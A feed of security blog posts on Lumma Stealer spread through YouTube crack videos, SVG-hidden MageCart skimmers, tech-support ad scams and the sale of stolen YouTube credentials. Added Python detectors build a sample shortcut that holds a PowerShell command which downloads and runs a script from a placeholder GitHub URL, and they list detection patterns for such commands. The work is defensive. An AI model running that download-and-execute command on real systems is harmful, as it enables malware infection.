YouTube Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed last built: Fri, 24 May 2024 17:22:16 +0000

YouTube Videos Promote Software Cracks With Lumma Stealer
https://gridinsoft.com/blogs/youtube-videos-cracks-lumma-stealer/
Tue, 09 Jan 2024 18:02:55 +0000

Researchers have discovered a cybersecurity threat that targets users through YouTube videos. These videos offer pirated software but are being used to distribute malware, specifically Lumma stealer.

YouTube Videos Promoting Malware

Researchers have identified a campaign that targets people looking for free software through YouTube videos. The videos look harmless and offer cracked versions of popular software, but the download they point to delivers a potent infostealer known as Lumma Stealer.

Video offering to download a cracked Sony Vegas (screenshot)

Although the video was published some time ago, it keeps gaining views. According to the researchers, the file offered in the video as a cracked program has been updated over time, which means the attackers may have switched to a malicious payload only after the video became popular. The same approach lets them distribute practically any malware through one link; Lumma is simply the first.

The Attack Chain

The attack begins innocently: the user searches for a cracked version of popular software such as Vegas Pro. A link in the video description leads to a bogus installer hosted on a file-sharing service such as MediaFire. The real danger is inside: the unpacked ZIP archive contains a Windows shortcut masquerading as a setup file.

In fact, the “setup” is a .lnk file that launches PowerShell with a script. From there things go by the textbook: the script downloads the payload from a GitHub repository and runs it. GitHub is chosen as the hosting because traffic to it is rarely blocked by firewalls or web filters, so the download blends in with legitimate activity.

Illustrative diagram of the attack process (image)
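The chain above (ZIP, a shortcut named like an installer, PowerShell, a download from GitHub) can be triaged before anything is double-clicked. The following Python script is an added example written for this article, not code from the original post or from the researchers it cites: it opens an archive, finds every .lnk entry, decodes the shortcut's StringData according to the public MS-SHLLINK layout, and flags shortcuts whose target is a script host or whose arguments fetch or decode code. The function names, the sample archive, the shortcut and the placeholder GitHub URL inside it are all constructed for the example.

```python
"""Triage a "cracked software" ZIP: list its .lnk entries and inspect what they run.

Added example, not code from the original post or the researchers it cites.
The shortcut layout follows the public MS-SHLLINK specification (ShellLinkHeader,
optional LinkTargetIDList and LinkInfo, then StringData). The sample archive and
shortcut are constructed here; the PowerShell command line and the GitHub URL in
it are placeholders, not the real loader.
"""
import io
import re
import struct
import zipfile

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}

# LinkFlags bits that change how the rest of the file is laid out.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields, in the order the specification stores them.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# Script hosts a "setup" shortcut has no business launching, and command-line
# markers of a stage-two download or an encoded command.
SCRIPT_HOSTS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b", re.I)
DOWNLOAD_MARKERS = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|-enc\b|encodedcommand|frombase64string", re.I)


def parse_lnk(data: bytes) -> dict:
    """Decode the LinkFlags and StringData of a Shell Link file.

    The target may also live in LinkTargetIDList (skipped here), so an empty
    relative_path does not mean the shortcut points nowhere.
    """
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {"flags": flags}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            fields[field] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        raw = data[pos + 2:pos + 2 + count * width]
        pos += 2 + count * width
        fields[field] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return fields


def assess_lnk(data: bytes) -> list:
    """Findings for one shortcut; an empty list means nothing looked off."""
    lnk = parse_lnk(data)
    findings = []
    if lnk["relative_path"] and SCRIPT_HOSTS.search(lnk["relative_path"]):
        findings.append("target is a script host: " + lnk["relative_path"])
    if lnk["arguments"] and DOWNLOAD_MARKERS.search(lnk["arguments"]):
        findings.append("arguments fetch or decode code: " + lnk["arguments"][:80])
    return findings


def scan_zip(zip_bytes: bytes) -> list:
    """(entry name, findings) for every .lnk in the archive, in archive order."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            findings = assess_lnk(zf.read(info))
            if re.search(r"setup|install|crack|keygen|patch", info.filename, re.I):
                findings.append("shortcut named like an installer: " + info.filename)
            results.append((info.filename, findings))
    return results


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk carrying only StringData (for the sample)."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags)
    header += b"\x00" * (HEADER_SIZE - len(header))      # attributes, times, etc.
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body + struct.pack("<I", 0)          # TerminalBlock


# Constructed sample: a shortcut named like an installer that launches PowerShell.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ".",
    "-nop -w hidden -c \"iex (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/example/repo/main/stage2.ps1')\"")


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the fake installer: a shortcut plus a readme."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Vegas Pro 21/Setup.lnk", SAMPLE_LNK)
        zf.writestr("Vegas Pro 21/ReadMe.txt", "Run Setup to install.")
    return buf.getvalue()


if __name__ == "__main__":
    for name, findings in scan_zip(build_sample_zip()):
        print(name, "->", findings or "nothing suspicious")
```

Run it as a script to see the verdict on the sample, or call scan_zip() on the bytes of a downloaded archive. A shortcut whose target is stored only in the LinkTargetIDList will show an empty relative_path, because that structure is skipped here; treat a PowerShell-looking command line as the stronger signal in that case.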

What is Lumma Stealer?

Lumma Stealer is an information-stealing malware written in C. It has been sold on Russian-speaking forums since August 2022 under a Malware-as-a-Service (MaaS) model. The threat actor behind it is believed to be “Shamel”, who operates under the alias “Lumma”. Its primary targets are cryptocurrency wallets and two-factor authentication (2FA) browser extensions.

Once on the victim’s machine, the malware collects sensitive data and exfiltrates it to its C2 server in HTTP POST requests that carry the User-Agent string “TeslaBrowser/5.5”, a value a proxy or IDS rule can match on. It also includes a non-resident loader that can deliver additional payloads as EXE, DLL or PowerShell.

Lumma Stealer starts at $250 per month on underground forums. The cheapest plan lets customers view and upload logs and use the log analysis tools. The most expensive plan costs $20,000 and gives the buyer access to the source code along with the right to resell the infostealer.

How to stay protected?

First, we recommend that you refrain from downloading and using pirated software, whether from torrents or any other source. It is illegal for home users and all the more so for companies, and the risks are described above. Beyond that, you can strengthen your protection against malware like Lumma Stealer by following these tips:

  • Avoid shady software-distribution websites. Whatever software they offer, the chance of getting infected through one is noticeably higher. Seek a more reliable source; it will save you both time and money. To check whether a site is legitimate and trustworthy, consider using the GridinSoft Free Online Virus Checker.
  • Don’t click on suspicious links. In the same spirit, be cautious with links, especially in emails, social media messages and on websites. Cybercriminals often rely on human curiosity to spread malware.
  • Use anti-malware protection. Install a reliable anti-malware program and keep it up to date; it can detect threats before they harm your system. GridinSoft Anti-Malware is a security solution you can rely on.


The post YouTube Videos Promote Software Cracks With Lumma Stealer appeared first on Gridinsoft Blog.

YouTube Video Causes Pixel Smartphones to Reboot
https://gridinsoft.com/blogs/youtube-and-pixel-smartphones/
Thu, 02 Mar 2023 10:33:41 +0000

Users have found that Pixel smartphones powered by Google Tensor processors reboot when the user tries to watch a clip from the movie “Alien” on YouTube in 4K HDR.

Let me remind you that we also wrote that a Janet Jackson Song Killed Hard Drives on Old Laptops, and that Cellmate men’s chastity belts are vulnerable to attacks and dangerous for users.

The media also reported that Bypassing the Lock Screen on Pixel Smartphones Netted a Researcher $70,000.

The strange issue was reported by users on the Google Pixel subreddit. A user with the nickname OGPixel5 writes that when you try to watch this video on YouTube, Google Pixel 6, 6a and Pixel 7 phones instantly reboot. Something in the video affects the devices so badly that they reboot before showing their owner a single frame.

Other users add that after the reboot, for some reason, cellular connectivity does not work, and to bring it back the device has to be restarted once more, this time manually.

Users’ main theory is that something in the video format (it is 4K HDR) crashes the phones. Similar bugs have happened before: in 2020 there was much discussion of a “cursed wallpaper” that crashed phones when set as the background (the cause was a colour-space handling error).

All phones affected by this bug use Google’s Tensor SoC, which was developed with Samsung and is closely related to its Exynos chips, so the problem does not show up on other devices. Samsung’s own Exynos-based devices could conceivably be affected as well, but so far no one has reported such crashes.

Reports of the reboot-inducing YouTube video first appeared online last weekend, and today Ars Technica journalists reported that the developers appear to have already fixed the bug. The publication says that yesterday the Pixel 7 Pro in its editorial office turned off instantly when the video was opened, while today it plays normally. Several users on the Pixel subreddit also report that the video now works fine.

Although neither users nor journalists found an app update or any other sign that a “patch” was released, the publication notes that Google is quite capable of changing how its phones behave remotely without installing an update.

The post YouTube Video Causes Pixel Smartphones to Reboot appeared first on Gridinsoft Blog.

Fraudsters Are Running a Malicious Advertising Campaign through Google Search
https://gridinsoft.com/blogs/malicious-campaign-through-google-search/
Fri, 22 Jul 2022 10:08:22 +0000

Malwarebytes, an information security company, has discovered a large malicious campaign that skilfully abuses Google search ads. A tech-support phishing campaign posing as Windows security alerts is spreading through Google Ads.

“What makes this campaign stand out is the fact that it exploits a very common search behavior when it comes to navigating the web: looking up a website by name instead of entering its full URL in the address bar. The threat actors are abusing Google’s ad network by purchasing ad space for popular keywords and their associated typos. A common human behavior is to open up a browser and do a quick search to get to the website you want without entering its full URL. Typically a user will (blindly) click on the first link returned (whether it is an ad or an organic search result),” Malwarebytes experts write.

Let me remind you that we wrote that Companies in the EU will have to remove Google Analytics from their websites, and also that Google Has Disabled Some of the Global Cache Servers in Russia.

When searching for “YouTube”, the first result is an ad that displays the correct youtube.com URL, with additional ad links shown below it.

Malicious Campaign through Google Search

Clicking that ad, however, does not lead to YouTube but to a fake Windows Defender tech-support page.

The scam sites are located at http://matkir[.]ml and http://159.223.199[.]181/ and warn visitors that “Windows has been locked down due to questionable activity” and that “Windows Defender detected a Trojan spyware called Ads.financetrack(2).dll”.

Malicious Campaign through Google Search

If the visitor comes through a VPN, the site redirects them to the official YouTube website instead, a cloaking trick that keeps the scam page away from researchers and automated scanners. When the victim calls the number on the page, the “support specialist” asks them to download and install TeamViewer. The scammer most likely uses TeamViewer to take control of the victim’s computer in order to “fix” the problem.

In most cases the scammer then locks the device, or claims the computer is infected and that the victim must buy a technical-support licence. At the time of writing the malicious campaign is still running in Google search. Google has not commented on the situation.

The most popular search terms used for the campaign are:

  1. YouTube;
  2. Amazon;
  3. Facebook;
  4. Walmart.

The post Fraudsters Are Running a Malicious Advertising Campaign through Google Search appeared first on Gridinsoft Blog.

Hackers hide MageCart skimmers in social media buttons
https://gridinsoft.com/blogs/hackers-hide-magecart-skimmers-in-social-media-buttons/
Mon, 07 Dec 2020 20:59:50 +0000

Sanguine Security analysts have discovered that hackers are using steganography to hide MageCart skimmers in the buttons that share a page to social media.

Let me remind you that the name MageCart originally referred to a single hacking group, the first to plant web skimmers (malicious JavaScript) on online-store pages to steal bank card data. The approach turned out to be so successful that the group soon had numerous imitators; MageCart became a generic term and is now applied to this whole class of attacks.

Steganography means hiding information within another format (for example, text within images, images within videos, and so on).

“In recent years, the most common form of steganographic attacks has been hiding malicious payloads within image files, usually in PNG or JPG formats,” Sanguine Security researchers say.

Web skimmer operators have followed this trend too, hiding their malicious code in website logos, product images or the favicon of the infected store.

Now, Sanguine Security experts write, new attacks hide the malicious code in SVG files rather than PNG or JPG. Most likely this is because security solutions have recently become better at detecting skimmers in ordinary raster images.

In theory, malicious code should be easier to spot in a vector image, since an SVG is plain XML text. However, the researchers write that the attackers anticipated this and designed their payload with it in mind.

“The malicious payload takes the form of an HTML “svg” element using the “path” element as a container for the payload. The payload itself is hidden using syntax that resembles the correct use of the “svg” element,” says the experts’ report.

According to the experts, the hackers tested this technique back in June, and in September it was found on active e-commerce sites, with malicious payloads hidden inside buttons for sharing content on social networks (Google, Facebook, Twitter, Instagram, YouTube, Pinterest, etc.).

On infected stores, as soon as a shopper reached the checkout page, a secondary component (called a decoder) read the malicious code hidden inside the social media icons and then loaded a keylogger that captured and stole bank card details from the checkout form.
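A defender auditing a store front end can apply the observation in the quoted report directly: genuine icon path data consists only of path commands, numbers and separators, so anything else inside a “path” element is a candidate container. The Python below is an added example, not code from Sanguine Security or the original post. It pulls inline SVG fragments out of a page, checks every path element for non-path characters in its d attribute, for attributes an icon has no use for, and for text content, and reports them for review. The sample page, its shortened icon paths, the function names and the placeholder strings hidden in two of the icons are all constructed for the example; nothing here is real skimmer code.

```python
"""Audit inline SVG icons for <path> elements that carry something besides path data.

Added example, not code from Sanguine Security or the original post. Heuristic:
real icon path data is only commands (M L H V C S Q T A Z), numbers and separators,
so a <path> whose d attribute holds other characters, that carries attributes an
icon never needs, or that has text content is a candidate payload container.
The sample page, its shortened icon paths and the placeholder strings hidden in
two of them are constructed here; none of it is real skimmer code.
"""
import re
import xml.etree.ElementTree as ET

# Anything outside this set cannot be SVG path data.
NOT_PATH_CHAR = re.compile(r"[^MmLlHhVvCcSsQqTtAaZz0-9\s,.+\-eE]")

# Attributes an icon's <path> plausibly carries. Others (data-* included) are
# flagged for review, not declared malicious.
KNOWN_PATH_ATTRS = {
    "d", "id", "class", "style", "fill", "fill-rule", "fill-opacity",
    "stroke", "stroke-width", "stroke-linecap", "stroke-linejoin",
    "stroke-opacity", "transform", "opacity", "clip-path", "clip-rule",
    "pathLength", "vector-effect", "role", "aria-hidden", "aria-label",
}

SVG_BLOCK = re.compile(r"<svg\b.*?</svg>", re.DOTALL | re.IGNORECASE)


def find_inline_svgs(html: str) -> list:
    """Every inline <svg>...</svg> fragment of a page, in document order."""
    return SVG_BLOCK.findall(html)


def local_name(qualified: str) -> str:
    """Strip an ElementTree namespace prefix such as '{http://www.w3.org/2000/svg}'."""
    return qualified.rsplit("}", 1)[-1]


def audit_svg(fragment: str) -> list:
    """Findings for one SVG fragment; an empty list means nothing looked off.

    Assumes the fragment is well-formed XML, which inline icons normally are.
    """
    findings = []
    for elem in ET.fromstring(fragment).iter():
        if local_name(elem.tag) != "path":
            continue
        for attr, value in elem.attrib.items():
            name = local_name(attr)
            if name == "d":
                hit = NOT_PATH_CHAR.search(value)
                if hit:
                    findings.append(
                        f"non-path characters in d from offset {hit.start()}: "
                        f"{value[hit.start():hit.start() + 40]!r}")
            elif name not in KNOWN_PATH_ATTRS:
                findings.append(f"unexpected attribute {name!r} on <path> ({len(value)} chars)")
        if (elem.text or "").strip() or any((child.tail or "").strip() for child in elem):
            findings.append("<path> carries text content, which an icon never needs")
    return findings


def audit_page(html: str) -> list:
    """(fragment index, findings) for every inline SVG that produced a finding."""
    results = []
    for index, fragment in enumerate(find_inline_svgs(html)):
        findings = audit_svg(fragment)
        if findings:
            results.append((index, findings))
    return results


# Constructed sample: three share buttons. The first is clean; the second hides a
# placeholder after the real path data; the third hides one in a spare attribute.
SAMPLE_HTML = """<!doctype html>
<html><body>
<a href="/share/facebook"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
  <path d="M12 2a10 10 0 1 0 0 20A10 10 0 0 0 12 2zm1.5 6.5h-1c-.5 0-.8.3-.8.8V11h1.8l-.3 2h-1.5v6h-2v-6H8v-2h1.7V9c0-1.7 1-2.7 2.6-2.7h1.2v2.2z"/>
</svg></a>
<a href="/share/twitter"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
  <path d="M22 5.9c-.7.3-1.5.5-2.3.6.8-.5 1.5-1.3 1.8-2.2-.8.5-1.6.8-2.5 1A4 4 0 0 0 12 8.8z (function(){/* placeholder, not a real skimmer */})()"/>
</svg></a>
<a href="/share/pinterest"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
  <path d="M12 2C6.5 2 2 6.5 2 12c0 4.2 2.6 7.8 6.3 9.3z" data-i="UExBQ0VIT0xERVI="/>
</svg></a>
</body></html>"""


if __name__ == "__main__":
    for index, findings in audit_page(SAMPLE_HTML):
        print(f"svg #{index}:")
        for finding in findings:
            print("  -", finding)
```

Flagged paths are leads, not verdicts: some themes legitimately put data-* attributes on icons, so compare the flagged markup against a known-good copy of the theme before calling it a compromise.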

What could come next I described, for example, in the note: Magecart groups extract stolen card data via Telegram.

The post Hackers hide MageCart skimmers in social media buttons appeared first on Gridinsoft Blog.

Steve Wozniak Sues YouTube Over Cryptocurrency Scammers
https://gridinsoft.com/blogs/steve-wozniak-sues-youtube-over-cryptocurrency-scammers/
Mon, 27 Jul 2020 16:49:25 +0000

Steve Wozniak and more than ten other plaintiffs have sued YouTube over fraudulent videos advertising fake Bitcoin giveaways.

The fact is that scammers are very fond of using the names of famous people in their schemes. For example, last month attackers hijacked three fairly popular YouTube channels and renamed them to look like SpaceX channels. The scammers then launched fake “live broadcasts” featuring Elon Musk, during which they ran a bogus Bitcoin giveaway.

In just two days the cybercriminals extracted more than $150,000 in cryptocurrency from viewers.

By the way, I wrote earlier that hacker forums show growing demand for credentials from YouTube channels.

Similarly, attackers often exploit the names of other famous people, including Steve Wozniak, Bill Gates and others. They show videos in which the celebrity discusses cryptocurrencies and blockchain, and ask viewers to send a small amount of cryptocurrency, promising to double any amount received and send it back.

An example of scammers exploiting Wozniak’s name (screenshot)

Alongside Wozniak, there are more than a dozen plaintiffs in the case who were deceived by such scammers and lost bitcoins (from a few dollars to $40,000). They argue that YouTube is not doing enough to detect such scams on its platform. For example, Wozniak’s wife Janet told Ars Technica that she has repeatedly contacted YouTube about these scammers since May of this year.

“YouTube has all the necessary tools to detect and suppress such undesirable actions, but the company does not even take obvious steps for this (for example, it does not filter videos that include phrases such as “bitcoins giveaway” in their titles)”, – claim the plaintiffs.

The lawsuit also mentions Twitter, as scammers regularly used that platform for the same purpose. In recent years, however, Twitter has been actively fighting such scams, and the plaintiffs believe the crackdown on Twitter pushed the scammers to YouTube, where they have operated freely for years.

The plaintiffs also argue that YouTube does not merely allow such videos to be posted. YouTube’s recommendation algorithms have promoted these videos to crypto enthusiasts, and ads have been embedded in them, meaning the platform has profited directly from the fraudulent videos.

Ars Technica journalists point out that in this case YouTube is protected by Section 230 of the Communications Decency Act. Essentially, the law grants online platforms immunity for inappropriate user content.

“Sites have immunity even if they do little to combat unwanted user content”, Ars Technica journalists note.

The publication recalls that courts usually rely on Section 230 even in cases where users distributed child pornography. It is unlikely that the court will view this problem differently, although the name Steve Wozniak may play its role, and perhaps YouTube will take the problem of cryptocurrency scams more seriously.

The post Steve Wozniak Sues YouTube Over Cryptocurrency Scammers appeared first on Gridinsoft Blog.

Hacker forums show growing demand for credentials from YouTube channels
https://gridinsoft.com/blogs/hacker-forums-show-growing-demand-for-credentials-from-youtube-channels/
Fri, 05 Jun 2020 16:56:00 +0000

IntSights experts have found that interest in YouTube channel credentials has recently grown on the darknet and that, as a “side effect”, this is stimulating credential-verification activity.

On hacker forums and sites that sell credentials, you can find more and more offers of this kind.

It should be noted that cybercriminals have long been interested in YouTube, because the platform gives them a new audience that can be exploited in a variety of ways, from fraud to advertising. In addition, attackers often “steal” popular channels from their rightful owners and then demand a ransom for returning access.

“Data on YouTube channels is mainly collected from computers infected with malware, as a result of phishing campaigns and so on. The stolen information is then sorted into logins and passwords for specific services and sold on the black market”, IntSights researchers said.

The price of a listing of YouTube channel credentials is proportional to the channel’s subscriber count. The researchers give several examples. In one case, the price for a channel with 200,000 subscribers started at $1,000 and rose in $200 increments.

In another case the researchers found an auction listing selling data from 990,000 active channels, with bidding starting at $1,500 (a buyer paying $2,500 received the list immediately, without bidding). The seller was evidently hoping to cash out quickly, fearing that the victims would notice the compromise, contact support and regain access to their accounts.

Another set of 687 YouTube accounts, sorted by subscriber count, was put up for sale at a starting price of $400 (bids rose in $100 increments, and for $5,000 the lot could be bought outright).

YouTube Channel Credentials

IntSights experts believe the sellers most likely assemble such lists by checking existing dumps of stolen logins and passwords for Google accounts and by using data harvested from infected computers.

IntSights also writes that cybercriminals previously used sophisticated phishing campaigns and reverse-proxy toolkits to get past Google’s two-factor authentication by relaying the victim’s login session in real time. Sellers now rarely mention 2FA, which most likely means the hijacked accounts were simply not protected by two-factor authentication.

Bleeping Computer notes that users whose YouTube accounts were hacked and hijacked often report being tricked into downloading malware. For example, complaints like this one can be found online:

“They pretended to be YouTube sponsors, and when I tried to access their site, a keylogger/spyware was loaded into my browser. Within a couple of minutes at most, they changed my password, removed my devices, and deleted the phone number and email used for recovery. Then they tried to extort money from me: they wanted me to send them BTC, or they would sell my channel.”

Another scam victim tells a similar story, where the scammers pretended to be looking for people to collaborate with.

For example, I told you that the MyKingz botnet uses a Taylor Swift photo to infect target machines. Just a nice photo)

The post Hacker forums show growing demand for credentials from YouTube channels appeared first on Gridinsoft Blog.
